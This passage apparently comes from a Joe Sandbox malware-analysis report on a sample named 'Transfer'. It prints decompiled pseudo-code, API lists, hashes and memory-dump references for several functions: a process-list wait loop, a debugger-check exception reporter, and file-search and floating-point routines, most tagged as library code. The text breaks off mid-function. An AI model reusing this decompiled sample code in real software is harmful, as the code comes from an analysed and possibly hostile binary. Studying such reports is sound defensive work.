Opcode Fuzzy Hash: c65088122ff8260dfb56112ce25a8b96b5169138691f43d878e73024cc35d2a3
Instruction Fuzzy Hash: 67E0ED311842259BE63136298C00B9A3B58FB517F9F184232AC04DB282FB20CC2183A6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00881510 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 172
sleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 76%

			E00881510() {
				int _v8;
				char _v16;
				signed int _v20;
				short _v540;
				int _v544;
				intOrPtr _v548;
				int _v552;
				char _v568;
				char _v1096;
				intOrPtr _v1124;
				void* _v1132;
				intOrPtr _v1136;
				intOrPtr _v1140;
				char _v1160;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t49;
				signed int _t50;
				intOrPtr _t55;
				void* _t62;
				long _t65;
				intOrPtr _t66;
				signed int _t79;
				signed int _t80;
				void* _t90;
				long _t91;
				void* _t92;
				intOrPtr* _t93;
				signed int _t95;
				intOrPtr* _t106;
				intOrPtr _t108;
				void* _t109;
				void* _t110;
				void* _t111;
				void* _t114;
				void* _t115;
				signed int _t116;

				_push(0xffffffff);
				_push(E0088E051);
				_push( *[fs:0x0]);
				_t49 =  *0x896004; // 0x239cc77c
				_t50 = _t49 ^ _t116;
				_v20 = _t50;
				_push(_t90);
				_push(_t109);
				_push(_t50);
				 *[fs:0x0] =  &_v16;
				GetModuleFileNameW(0,  &_v540, 0x100);
				_v548 = 7;
				_v552 = 0;
				_v568 = 0;
				if(_v540 != 0) {
					_t93 =  &_v540;
					_t108 = _t93 + 2;
					do {
						_t55 =  *_t93;
						_t93 = _t93 + 2;
					} while (_t55 != 0);
					_t95 = _t93 - _t108 >> 1;
				} else {
					_t95 = 0;
				}
				_push(_t95);
				E00881A90(_t90,  &_v568,  &_v540);
				_v8 = 0;
				_v544 = 0x5c;
				_t62 = E008818E0( &_v568,  &_v1160, E008819F0( &_v568,  &_v544) + 1, _v552 - _t59 - 1);
				_t113 = _t62;
				if( &_v568 != _t62) {
					_t85 = _v548;
					if(_v548 >= 8) {
						E00881C00(_t90, _t108, _t109, _v568, _t85 + 1);
					}
					_v548 = 7;
					_v552 = 0;
					_v568 = 0;
					E00881B90( &_v568, _t113);
				}
				_t64 = _v1140;
				if(_v1140 >= 8) {
					E00881C00(_t90, _t108, _t109, _v1160, _t64 + 1);
				}
				_t65 = GetCurrentProcessId();
				_t110 = Process32NextW;
				_t91 = _t65;
				_t66 = 0;
				_v1132 = 0x22c;
				asm("o16 nop [eax+eax]");
				while(_t66 < 0x32) {
					_v544 = 0;
					_v1136 = _t66 + 1;
					_t115 = CreateToolhelp32Snapshot(2, 0);
					_push( &_v1132);
					if(Process32FirstW(_t115) == 1 && Process32NextW(_t115,  &_v1132) == 1) {
						do {
							_t106 =  &_v1096;
							_t79 =  >=  ? _v568 :  &_v568;
							asm("o16 nop [eax+eax]");
							while(1) {
								_t108 =  *_t106;
								if(_t108 !=  *_t79) {
									break;
								}
								if(_t108 == 0) {
									L20:
									_t80 = 0;
								} else {
									_t108 =  *((intOrPtr*)(_t106 + 2));
									if(_t108 !=  *((intOrPtr*)(_t79 + 2))) {
										break;
									} else {
										_t106 = _t106 + 4;
										_t79 = _t79 + 4;
										if(_t108 != 0) {
											continue;
										} else {
											goto L20;
										}
									}
								}
								L22:
								if(_t80 != 0 || _v1124 == _t91) {
									goto L24;
								} else {
									_v544 = 1;
									Sleep(0x64);
								}
								goto L27;
							}
							asm("sbb eax, eax");
							_t80 = _t79 | 0x00000001;
							goto L22;
							L24:
						} while (Process32NextW(_t115,  &_v1132) == 1);
					}
					L27:
					CloseHandle(_t115);
					_t66 = _v1136;
					if(_v544 != 0) {
						continue;
					}
					break;
				}
				Sleep(0xc8);
				_t67 = _v548;
				if(_v548 >= 8) {
					E00881C00(_t91, _t108, _t110, _v568, _t67 + 1);
				}
				 *[fs:0x0] = _v16;
				_pop(_t111);
				_pop(_t114);
				_pop(_t92);
				return E008825A8(_t92, _v20 ^ _t116, _t111, _t114);
			}

0x00881513
0x00881515
0x00881520
0x00881527
0x0088152c
0x0088152e
0x00881531
0x00881533
0x00881534
0x00881538
0x0088154c
0x00881554
0x0088155e
0x00881568
0x00881576
0x0088157c
0x00881582
0x00881585
0x00881585
0x00881588
0x0088158b
0x00881592
0x00881578
0x00881578
0x00881578
0x00881594
0x008815a2
0x008815aa
0x008815b7
0x008815e6
0x008815eb
0x008815f5
0x008815f7
0x00881600
0x0088160a
0x0088160a
0x00881611
0x00881622
0x0088162c
0x00881633
0x00881633
0x00881638
0x00881641
0x0088164b
0x0088164b
0x00881650
0x00881656
0x0088165c
0x0088165e
0x00881660
0x0088166a
0x00881670
0x0088167c
0x00881688
0x00881694
0x0088169c
0x008816a7
0x008816c0
0x008816cd
0x008816d3
0x008816da
0x008816e0
0x008816e0
0x008816e6
0x00000000
0x00000000
0x008816eb
0x00881702
0x00881702
0x008816ed
0x008816ed
0x008816f5
0x00000000
0x008816f7
0x008816f7
0x008816fa
0x00881700
0x00000000
0x00000000
0x00000000
0x00000000
0x00881700
0x008816f5
0x0088170b
0x0088170d
0x00000000
0x00881728
0x0088172a
0x00881734
0x00881734
0x00000000
0x0088170d
0x00881706
0x00881708
0x00000000
0x00881717
0x00881721
0x00881726
0x0088173a
0x0088173b
0x00881748
0x0088174e
0x00000000
0x00000000
0x00000000
0x0088174e
0x00881759
0x0088175f
0x00881768
0x00881772
0x00881772
0x0088177a
0x00881782
0x00881783
0x00881784
0x00881792

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000100,239CC77C), ref: 0088154C
GetCurrentProcessId.KERNEL32(?,00000001,-00000001,?), ref: 00881650
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0088168E
Process32FirstW.KERNEL32(00000000,0000022C), ref: 0088169E
Process32NextW.KERNEL32(00000000,0000022C), ref: 008816B5
Process32NextW.KERNEL32(00000000,0000022C), ref: 0088171F
Sleep.KERNEL32(00000064), ref: 00881734
CloseHandle.KERNEL32(00000000), ref: 0088173B
Sleep.KERNEL32(000000C8), ref: 00881759

Strings

\, xrefs: 008815B7

Memory Dump Source

Source File: 00000003.00000002.580938453.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000003.00000002.580930254.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580956216.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580968768.0000000000896000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580983190.0000000000898000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_880000_Transfer.jbxd

Similarity

API ID: Process32$NextSleep$CloseCreateCurrentFileFirstHandleModuleNameProcessSnapshotToolhelp32
String ID: \
API String ID: 8921262-2967466578
Opcode ID: 5153bd40f7dd7bf6eaa6658b8fcfe43730dfa621415f3b5cba0d37fbc8d723ba
Instruction ID: df08f6aabdc4e9bf0e7182945a3306785d453e35ca0c51e74a525f696765cfc5
Opcode Fuzzy Hash: 5153bd40f7dd7bf6eaa6658b8fcfe43730dfa621415f3b5cba0d37fbc8d723ba
Instruction Fuzzy Hash: 836188719011299EDF20FB64CD8DBEAB3B8FB15304F1001E9E50AE2151EB35AE86CF65

Uniqueness

Uniqueness Score: -1.00%

Function 008855D7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 78
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 78%

			E008855D7(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				void* __edi;
				signed int _t40;
				char* _t47;
				char* _t49;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr _t67;
				int _t68;
				intOrPtr _t69;
				signed int _t70;

				_t69 = __esi;
				_t66 = __edx;
				_t61 = __ebx;
				_t40 =  *0x896004; // 0x239cc77c
				_t41 = _t40 ^ _t70;
				_v8 = _t40 ^ _t70;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E00882F64(_t41);
					_pop(_t62);
				}
				E00884940(_t67,  &_v804, 0, 0x50);
				E00884940(_t67,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t62;
				_v556 = _t66;
				_v560 = _t61;
				_v564 = _t69;
				_v568 = _t67;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t68 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				if(UnhandledExceptionFilter( &_v812) == 0 && _t68 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					E00882F64(_t57);
				}
				return E008825A8(_t61, _v8 ^ _t70, _t68, _t69);
			}

0x008855d7
0x008855d7
0x008855d7
0x008855e2
0x008855e7
0x008855e9
0x008855f1
0x008855f3
0x008855f6
0x008855fb
0x008855fb
0x00885607
0x0088561a
0x00885628
0x0088562e
0x00885634
0x0088563a
0x00885640
0x00885646
0x0088564c
0x00885652
0x00885658
0x0088565e
0x00885665
0x0088566c
0x00885673
0x0088567a
0x00885681
0x00885688
0x00885689
0x00885692
0x00885698
0x0088569b
0x008856a1
0x008856ae
0x008856b7
0x008856c0
0x008856c9
0x008856d7
0x008856d9
0x008856ee
0x008856fa
0x008856fd
0x00885702
0x00885711

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,0088330B), ref: 008856CF
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0088330B), ref: 008856D9
UnhandledExceptionFilter.KERNEL32(00000016,?,?,?,?,?,0088330B), ref: 008856E6

Strings

`VqtPPqt, xrefs: 008856CF
Pdqt, xrefs: 008856D9

Memory Dump Source

Source File: 00000003.00000002.580938453.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000003.00000002.580930254.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580956216.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580968768.0000000000896000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580983190.0000000000898000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_880000_Transfer.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID: Pdqt$`VqtPPqt
API String ID: 3906539128-2827380007
Opcode ID: 65de8efd2679b49ff157f010075977102cb80b6f682915ac37c4577825e1f03a
Instruction ID: 5d6a3d341ba3db02e90ce24b0b854caa7228d9c36d049eed17f39d32f13fbaf4
Opcode Fuzzy Hash: 65de8efd2679b49ff157f010075977102cb80b6f682915ac37c4577825e1f03a
Instruction Fuzzy Hash: 7331B3759412289BCB21EF68DD8979DBBB8FF08310F5041EAE90CA7251EB349B85CF45

Uniqueness

Uniqueness Score: -1.00%

Function 00886268 Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00886268(int _a4) {
				void* _t14;
				void* _t15;
				void* _t17;
				void* _t18;

				if(E00888597(_t14, _t15, _t17, _t18) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E008862ED(_t15, _a4);
				ExitProcess(_a4);
			}

0x00886274
0x00886290
0x00886290
0x00886299
0x008862a2

APIs

GetCurrentProcess.KERNEL32(00000003,?,0088623E,00000003,00894638,0000000C,00886395,00000003,00000002,00000000,?,00886BDA,00000003), ref: 00886289
TerminateProcess.KERNEL32(00000000,?,0088623E,00000003,00894638,0000000C,00886395,00000003,00000002,00000000,?,00886BDA,00000003), ref: 00886290
ExitProcess.KERNEL32 ref: 008862A2

Memory Dump Source

Source File: 00000003.00000002.580938453.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000003.00000002.580930254.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580956216.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580968768.0000000000896000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580983190.0000000000898000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_880000_Transfer.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: e65b0aaf3c48e1179bcd68dcac11892505b148fc37f28f68518558c2235ff2ea
Instruction ID: 67f1c78af4430bde2aa61594e0956121552a642c3583aa2e26015600324a8779
Opcode Fuzzy Hash: e65b0aaf3c48e1179bcd68dcac11892505b148fc37f28f68518558c2235ff2ea
Instruction Fuzzy Hash: EAE0B631400648EFDF117F58DE09E593BA9FB84791F108464FA09DA123DB35ED52CB91

Uniqueness

Uniqueness Score: -1.00%

Function 008875CA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E008875CA(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v28;
				signed int _v32;
				WCHAR* _v36;
				signed int _v48;
				intOrPtr _v556;
				intOrPtr _v558;
				struct _WIN32_FIND_DATAW _v604;
				intOrPtr* _v608;
				signed int _v612;
				signed int _v616;
				intOrPtr _v644;
				intOrPtr _v648;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t40;
				signed int _t45;
				signed int _t48;
				signed int _t50;
				signed int _t51;
				signed char _t53;
				signed int _t62;
				void* _t64;
				union _FINDEX_INFO_LEVELS _t66;
				signed int _t71;
				intOrPtr* _t72;
				signed int _t75;
				void* _t82;
				void* _t84;
				signed int _t85;
				void* _t89;
				WCHAR* _t90;
				void* _t91;
				intOrPtr* _t94;
				intOrPtr _t97;
				void* _t99;
				signed int _t100;
				intOrPtr* _t104;
				signed int _t107;
				void* _t110;
				intOrPtr _t111;
				void* _t112;
				void* _t114;
				void* _t115;
				signed int _t117;
				void* _t118;
				union _FINDEX_INFO_LEVELS _t119;
				void* _t120;
				void* _t123;
				void* _t124;
				void* _t125;
				signed int _t126;
				void* _t127;
				void* _t128;
				signed int _t132;
				void* _t133;
				signed int _t134;
				void* _t135;
				void* _t136;

				_push(__ecx);
				_t94 = _a4;
				_t2 = _t94 + 2; // 0x2
				_t110 = _t2;
				do {
					_t40 =  *_t94;
					_t94 = _t94 + 2;
				} while (_t40 != 0);
				_t117 = _a12;
				_t97 = (_t94 - _t110 >> 1) + 1;
				_v8 = _t97;
				if(_t97 <= (_t40 | 0xffffffff) - _t117) {
					_t5 = _t117 + 1; // 0x1
					_t89 = _t5 + _t97;
					_t124 = E00886BDB(_t97, _t89, 2);
					_t99 = _t123;
					__eflags = _t117;
					if(_t117 == 0) {
						L6:
						_push(_v8);
						_t89 = _t89 - _t117;
						_t45 = E0088734E(_t99, _t124 + _t117 * 2, _t89, _a4);
						_t134 = _t133 + 0x10;
						__eflags = _t45;
						if(__eflags != 0) {
							goto L9;
						} else {
							_t82 = E00887843(_a16, __eflags, _t124);
							E00886B10(0);
							_t84 = _t82;
							goto L8;
						}
					} else {
						_push(_t117);
						_t85 = E0088734E(_t99, _t124, _t89, _a8);
						_t134 = _t133 + 0x10;
						__eflags = _t85;
						if(_t85 != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E008857CE();
							asm("int3");
							_t132 = _t134;
							_t135 = _t134 - 0x260;
							_t48 =  *0x896004; // 0x239cc77c
							_v48 = _t48 ^ _t132;
							_t111 = _v28;
							_t100 = _v32;
							_push(_t89);
							_t90 = _v36;
							_push(_t124);
							_push(_t117);
							_t125 = 0x5c;
							_v644 = _t111;
							_v648 = 0x2f;
							_t118 = 0x3a;
							while(1) {
								__eflags = _t100 - _t90;
								if(_t100 == _t90) {
									break;
								}
								_t50 =  *_t100 & 0x0000ffff;
								__eflags = _t50 - _v612;
								if(_t50 != _v612) {
									__eflags = _t50 - _t125;
									if(_t50 != _t125) {
										__eflags = _t50 - _t118;
										if(_t50 != _t118) {
											_t100 = _t100 - 2;
											__eflags = _t100;
											continue;
										}
									}
								}
								break;
							}
							_t126 =  *_t100 & 0x0000ffff;
							__eflags = _t126 - _t118;
							if(_t126 != _t118) {
								L19:
								_t51 = _t126;
								_t119 = 0;
								_t112 = 0x2f;
								__eflags = _t51 - _t112;
								if(_t51 == _t112) {
									L23:
									_t53 = 1;
									__eflags = 1;
								} else {
									_t114 = 0x5c;
									__eflags = _t51 - _t114;
									if(_t51 == _t114) {
										goto L23;
									} else {
										_t115 = 0x3a;
										__eflags = _t51 - _t115;
										if(_t51 == _t115) {
											goto L23;
										} else {
											_t53 = 0;
										}
									}
								}
								_t103 = (_t100 - _t90 >> 1) + 1;
								asm("sbb eax, eax");
								_v612 =  ~(_t53 & 0x000000ff) & (_t100 - _t90 >> 0x00000001) + 0x00000001;
								E00884940(_t119,  &_v604, _t119, 0x250);
								_t136 = _t135 + 0xc;
								_t127 = FindFirstFileExW(_t90, _t119,  &_v604, _t119, _t119, _t119);
								__eflags = _t127 - 0xffffffff;
								if(_t127 != 0xffffffff) {
									_t104 = _v608;
									_t62 =  *((intOrPtr*)(_t104 + 4)) -  *_t104;
									__eflags = _t62;
									_v616 = _t62 >> 2;
									_t64 = 0x2e;
									do {
										__eflags = _v604.cFileName - _t64;
										if(_v604.cFileName != _t64) {
											L36:
											_push(_t104);
											_t66 = E008875CA(_t104,  &(_v604.cFileName), _t90, _v612);
											_t136 = _t136 + 0x10;
											__eflags = _t66;
											if(_t66 != 0) {
												goto L26;
											} else {
												goto L37;
											}
										} else {
											__eflags = _v558 - _t119;
											if(_v558 == _t119) {
												goto L37;
											} else {
												__eflags = _v558 - _t64;
												if(_v558 != _t64) {
													goto L36;
												} else {
													__eflags = _v556 - _t119;
													if(_v556 == _t119) {
														goto L37;
													} else {
														goto L36;
													}
												}
											}
										}
										goto L40;
										L37:
										_t71 = FindNextFileW(_t127,  &_v604);
										_t104 = _v608;
										__eflags = _t71;
										_t64 = 0x2e;
									} while (_t71 != 0);
									_t72 = _t104;
									_t107 = _v616;
									_t113 =  *_t72;
									_t75 =  *((intOrPtr*)(_t72 + 4)) -  *_t72 >> 2;
									__eflags = _t107 - _t75;
									if(_t107 != _t75) {
										E00889F50(_t90, _t113 + _t107 * 4, _t75 - _t107, 4, E008873E5);
									}
								} else {
									_push(_v608);
									_t66 = E008875CA(_t103, _t90, _t119, _t119);
									L26:
									_t119 = _t66;
								}
								__eflags = _t127 - 0xffffffff;
								if(_t127 != 0xffffffff) {
									FindClose(_t127);
								}
							} else {
								__eflags = _t100 -  &(_t90[1]);
								if(_t100 ==  &(_t90[1])) {
									goto L19;
								} else {
									_push(_t111);
									E008875CA(_t100, _t90, 0, 0);
								}
							}
							_pop(_t120);
							_pop(_t128);
							__eflags = _v12 ^ _t132;
							_pop(_t91);
							return E008825A8(_t91, _v12 ^ _t132, _t120, _t128);
						} else {
							goto L6;
						}
					}
				} else {
					_t84 = 0xc;
					L8:
					return _t84;
				}
				L40:
			}

0x008875cf
0x008875d0
0x008875d7
0x008875d7
0x008875da
0x008875da
0x008875dd
0x008875e0
0x008875e5
0x008875ef
0x008875f2
0x008875f7
0x008875ff
0x00887602
0x0088760c
0x0088760f
0x00887610
0x00887612
0x00887626
0x00887626
0x00887629
0x00887633
0x00887638
0x0088763b
0x0088763d
0x00000000
0x0088763f
0x00887643
0x0088764c
0x00887652
0x00000000
0x00887654
0x00887614
0x00887614
0x0088761a
0x0088761f
0x00887622
0x00887624
0x0088765b
0x0088765d
0x0088765e
0x0088765f
0x00887660
0x00887661
0x00887662
0x00887667
0x0088766b
0x0088766d
0x00887673
0x0088767a
0x0088767d
0x00887680
0x00887683
0x00887684
0x00887687
0x00887688
0x0088768b
0x0088768e
0x00887694
0x0088769e
0x008876ba
0x008876ba
0x008876bc
0x00000000
0x00000000
0x008876a1
0x008876a4
0x008876ab
0x008876ad
0x008876b0
0x008876b2
0x008876b5
0x008876b7
0x008876b7
0x00000000
0x008876b7
0x008876b5
0x008876b0
0x00000000
0x008876ab
0x008876be
0x008876c1
0x008876c4
0x008876e0
0x008876e2
0x008876e4
0x008876e6
0x008876e7
0x008876ea
0x00887700
0x00887702
0x00887702
0x008876ec
0x008876ee
0x008876ef
0x008876f2
0x00000000
0x008876f4
0x008876f6
0x008876f7
0x008876fa
0x00000000
0x008876fc
0x008876fc
0x008876fc
0x008876fa
0x008876f2
0x0088770a
0x00887712
0x00887716
0x00887724
0x00887729
0x0088773e
0x00887740
0x00887743
0x00887778
0x00887783
0x00887783
0x00887788
0x0088778e
0x0088778f
0x0088778f
0x00887796
0x008877b3
0x008877b3
0x008877c2
0x008877c7
0x008877ca
0x008877cc
0x00000000
0x00000000
0x00000000
0x00000000
0x00887798
0x00887798
0x0088779f
0x00000000
0x008877a1
0x008877a1
0x008877a8
0x00000000
0x008877aa
0x008877aa
0x008877b1
0x00000000
0x00000000
0x00000000
0x00000000
0x008877b1
0x008877a8
0x0088779f
0x00000000
0x008877ce
0x008877d6
0x008877dc
0x008877e2
0x008877e6
0x008877e6
0x008877e9
0x008877eb
0x008877f1
0x008877f8
0x008877fb
0x008877fd
0x00887811
0x00887816
0x00887745
0x0088774b
0x0088774f
0x00887757
0x00887757
0x00887757
0x00887759
0x0088775c
0x0088775f
0x0088775f
0x008876c6
0x008876c9
0x008876cb
0x00000000
0x008876cd
0x008876cd
0x008876d3
0x008876d8
0x008876cb
0x0088776a
0x0088776b
0x0088776c
0x0088776e
0x00887777
0x00000000
0x00000000
0x00000000
0x00887624
0x008875f9
0x008875fb
0x00887655
0x0088765a
0x0088765a
0x00000000

Strings

/, xrefs: 00887694

Memory Dump Source

Source File: 00000003.00000002.580938453.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000003.00000002.580930254.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580956216.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580968768.0000000000896000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580983190.0000000000898000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_880000_Transfer.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: 776e64acdb9dc225b6e3a1db68383915353dd4898ba63e7a9a496d7a6a3543b5
Instruction ID: 8a22f1a155d742d3626fef1acea757297d8600c68cc160177b057381526760a1
Opcode Fuzzy Hash: 776e64acdb9dc225b6e3a1db68383915353dd4898ba63e7a9a496d7a6a3543b5
Instruction Fuzzy Hash: 6341D276900619AACB24BF69CC89EAB77B9FB84714F204269F905D7181F630DE81CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0088CD15 Relevance: 1.8, APIs: 1, Instructions: 269
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 100%

			E0088CD15(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
				signed int _t172;
				signed int _t175;
				signed int _t178;
				signed int* _t179;
				signed int _t195;
				signed int _t199;
				signed int _t202;
				void* _t203;
				void* _t206;
				signed int _t209;
				void* _t210;
				signed int _t225;
				unsigned int* _t240;
				signed char _t242;
				signed int* _t250;
				unsigned int* _t256;
				signed int* _t257;
				signed char _t259;
				long _t262;
				signed int* _t265;

				 *(_a4 + 4) = 0;
				_t262 = 0xc000000d;
				 *(_a4 + 8) = 0;
				 *(_a4 + 0xc) = 0;
				_t242 = _a12;
				if((_t242 & 0x00000010) != 0) {
					_t262 = 0xc000008f;
					 *(_a4 + 4) =  *(_a4 + 4) | 1;
				}
				if((_t242 & 0x00000002) != 0) {
					_t262 = 0xc0000093;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
				}
				if((_t242 & 0x00000001) != 0) {
					_t262 = 0xc0000091;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
				}
				if((_t242 & 0x00000004) != 0) {
					_t262 = 0xc000008e;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
				}
				if((_t242 & 0x00000008) != 0) {
					_t262 = 0xc0000090;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
				}
				_t265 = _a8;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 << 4) ^  *(_a4 + 8)) & 0x00000010;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 +  *_t265) ^  *(_a4 + 8)) & 0x00000008;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 1) ^  *(_a4 + 8)) & 0x00000004;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 3) ^  *(_a4 + 8)) & 0x00000002;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 5) ^  *(_a4 + 8)) & 1;
				_t259 = E0088AA1F(_a4);
				if((_t259 & 0x00000001) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
				}
				if((_t259 & 0x00000004) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
				}
				if((_t259 & 0x00000008) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
				}
				if((_t259 & 0x00000010) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
				}
				if((_t259 & 0x00000020) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
				}
				_t172 =  *_t265 & 0x00000c00;
				if(_t172 == 0) {
					 *_a4 =  *_a4 & 0xfffffffc;
				} else {
					if(_t172 == 0x400) {
						_t257 = _a4;
						_t225 =  *_t257 & 0xfffffffd | 1;
						L26:
						 *_t257 = _t225;
						L29:
						_t175 =  *_t265 & 0x00000300;
						if(_t175 == 0) {
							_t250 = _a4;
							_t178 =  *_t250 & 0xffffffeb | 0x00000008;
							L35:
							 *_t250 = _t178;
							L36:
							_t179 = _a4;
							_t254 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
							if(_a28 == 0) {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
								 *((long long*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t254 = _a4;
								_t240 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
								 *(_a4 + 0x50) =  *_t240;
							} else {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t240 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
								 *(_a4 + 0x50) =  *_t240;
							}
							E0088A985(_t254);
							RaiseException(_t262, 0, 1,  &_a4);
							_t256 = _a4;
							if((_t256[2] & 0x00000010) != 0) {
								 *_t265 =  *_t265 & 0xfffffffe;
							}
							if((_t256[2] & 0x00000008) != 0) {
								 *_t265 =  *_t265 & 0xfffffffb;
							}
							if((_t256[2] & 0x00000004) != 0) {
								 *_t265 =  *_t265 & 0xfffffff7;
							}
							if((_t256[2] & 0x00000002) != 0) {
								 *_t265 =  *_t265 & 0xffffffef;
							}
							if((_t256[2] & 0x00000001) != 0) {
								 *_t265 =  *_t265 & 0xffffffdf;
							}
							_t195 =  *_t256 & 0x00000003;
							if(_t195 == 0) {
								 *_t265 =  *_t265 & 0xfffff3ff;
							} else {
								_t206 = _t195 - 1;
								if(_t206 == 0) {
									_t209 =  *_t265 & 0xfffff7ff | 0x00000400;
									L55:
									 *_t265 = _t209;
									L58:
									_t199 =  *_t256 >> 0x00000002 & 0x00000007;
									if(_t199 == 0) {
										_t202 =  *_t265 & 0xfffff3ff | 0x00000300;
										L64:
										 *_t265 = _t202;
										L65:
										if(_a28 == 0) {
											 *_t240 = _t256[0x14];
										} else {
											 *_t240 = _t256[0x14];
										}
										return _t202;
									}
									_t203 = _t199 - 1;
									if(_t203 == 0) {
